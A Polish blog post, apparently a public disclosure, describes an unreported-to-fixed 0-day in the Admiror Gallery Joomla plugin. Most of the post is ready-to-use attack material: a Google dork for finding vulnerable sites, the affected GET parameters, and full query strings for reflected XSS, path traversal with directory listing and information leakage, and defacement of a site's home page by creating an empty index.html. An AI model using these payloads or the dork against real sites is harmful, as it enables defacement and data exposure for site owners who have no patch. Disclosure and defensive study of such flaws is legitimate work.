Nasze
Artykuły

0Day Admiror Gallery

0Day Admiror Gallery

Jakiś czas temu, odnaleźliśmy lukę typu 0Day w Galerii zdjęć Joomla o nazwie Admiror Gallery – po wielokrotnych zgłoszeniach nie otrzymaliśmy żadnych informacji od twórcy, w związku z czym poczuwamy się do obowiązku aby naświetlić sytuację i przestrzec Was przed atakiem na Waszą aplikację.


Link do pluginu:

http://www.admiror-design-studio.com/admiror-joomla-extensions/admiror-gallery

Google Dork:

AG_form_albumInitFolders_1

Podatne parametry:

GET: ?AG_form_albumInitFolders_1=path/ //Path traversal/Directory Listing/Information Leakage
GET: ?AG_form_scrollTop=0 //XSS (onload)

Przykład XSS:

?AG_MK=0&AG_form_paginInitPages_1=1&AG_form_albumInitFolders_1=APG/b&AG_form_scrollTop=0);alert(1&AG_form_scrollLeft=0&AG_MK=0

Przykład Path traversal - Information Leakage:

?AG_MK=0&AG_form_paginInitPages_1=1&AG_form_albumInitFolders_1=APG/path&AG_form_scrollTop=0&AG_form_scrollLeft=0&AG_MK=0

Przykład usage Path traversal - Directory Listing:

?AG_MK=0&AG_form_paginInitPages_1=1&AG_form_albumInitFolders_1=APG/.&AG_form_scrollTop=0&AG_form_scrollLeft=0&AG_MK=0

Przykład usage Path traversal – podmiana strony głównej poprzez utworzenie pustego index.html:

?AG_MK=0&AG_form_paginInitPages_1=1&AG_form_albumInitFolders_1=APG/..&AG_form_scrollTop=0&AG_form_scrollLeft=0&AG_MK=0?AG_MK=0&AG_form_paginInitPages_1=1&AG_form_albumInitFolders_1=APG/../..&AG_form_scrollTop=0&AG_form_scrollLeft=0&AG_MK=0